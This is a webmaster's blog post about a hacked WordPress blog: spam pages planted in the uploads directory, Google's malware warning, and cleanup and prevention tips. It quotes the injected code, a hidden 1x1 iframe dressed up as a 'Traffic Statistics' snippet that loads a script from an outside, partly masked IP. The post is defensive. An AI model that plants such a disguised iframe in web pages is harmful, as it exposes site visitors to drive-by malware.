Wordpress Hackers

For more than 7 years now, I've been working with websites based on popular applications such as WordPress, Vbulletin and PHPnuke. When dealing with such popular applications, words like 'hacking' or 'security hole' will become something that you'll get use to either dealing with or worrying about.

In the last 2 years, there have been some major developing concerns. Today, Hackers are much more familiar with the importance of links and, since some may be SEO's, are using hacking as a link building strategy or as a negative link building tactic targeting the ranking of their competitors. Regardless of the intention of the Hacker, your website's ranking may be damaged to some degree.

My story started few days ago with Google showing this message associated with the search engine results for one of my personal websites. “This site may harm your computer.”

On the same day, I got an email from Google notifying me about this. To ensure you receive this notification, ensure you have access to abuse@yourdomain.com email.

The website in question is a relatively small one based on WordPress. This made me recall an incident from a month ago when a hacker uploaded more than ten pages on my site. Each page, which had more than 100 links pointing to many of the worst websites in the world, were uploaded to my UPLOAD WP directory “/wp-content/uploads/”

This directory is a fairly easy target as it has 777 permissions. I suspect the individual may be an SEO, as he knew that uploading these pages will mean nothing in this directory unless they have some inbound links so the search engine will know about them. As a result, the individual built tens of inbound links to these pages and got them indexed. I found out about these pages only after they were indexed and before having them removed.

After reading the message from Google, I began to think that they acted very late for this incident, as such, I didn’t make any changes on the site. The only thing I did was to download the entire site files and scan them with a spyware software, everything appeared clean.

Wordpress Hackers

Next I went through the files and didn’t find anything wrong so I went to Google webmaster Tools where I found almost an entire page alert about the problem with a link to review the website. Next I filed a revision request.

Two days later, I re-checked Google Webmaster Tools only to find a new Google response including four pages (URL's) on my blog having the offending code. After a quick review for the pages I found a code repeated on all of them and didn’t look clean as it has an Iframe

<!-- Traffic Statistics --> <iframe src=http://xx.xx.xxx.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

Lastly, I conducted some additional research and found out that the folks at WordPress support forum were discussing the same problem, however were not sure about the infected version of WordPress. In my case, I believe it's WordPress 2.5 and/or may be older versions. I then checked all WordPress files on my website and none of them has this code, so the code most likely was injected in the database using xmlrpc.php which has the ability to import remote content to WordPress.

I removed the offending code and went back again to Google Webmaster Tools, filed another revision request and got the message “This site may harm your computer.” removed, it took me 3 days to get rid of this message while many people keep saying that might take up to 15 days and the credit for this quick result should be given to the amazing team behind Google Webmaster Tools the guys there respond to any revision request in less than 24 hours, the really deal responsibly with webmasters encountering this message as they know the damage it causes to any website.

Hopefully this doesn't happen to you, however if it does, here are list of check-ups to conduct:

How to diagnose if your blog has this problem:

1- If you feel your blog is taking more time than usual to load, or if you see in the status bar a message says connecting to xx.xxx.x.157
2- IF you view the source code of any page in your blog and see this code.
3- If your blog search engines result marked “This site may harm your computer.” Or you get any message from Google in this regard.

How to fix this problem:

1- Upgrade your WordPress to the latest version, and keep doing that on monthly basis, the folks there will figure out how to keep WordPress safe software so lean on them.
2- Upgrading WordPress will not take the code off, you need to go to the infected post and use the HTML edit button in WordPress and remove the code, or if you have PHP MYadmin you can use it, just choose your blog database and then go to search, put in the search box any word of the code like “iframe” and select the table wp_posts and hit go, you will see all the infected posts.

How to protect yourself in future:

1- As mentioned before, keep your word press updated to the latest version and make sure to stay updated with their announcements.
2- Every month scan manually your WordPress files and see if you find any suspicious files.
3- Check always your webstat especially the content section and see if there are any pages record visits but you don’t know about them.
4- Check the source code of your posts on regular basis to make sure that it is clean of any malicious codes.

As blog strategy is getting more popular among SEO companies, the technical part of WordPress should be covered all the time by some technical people to save the good work of marketing people. :-)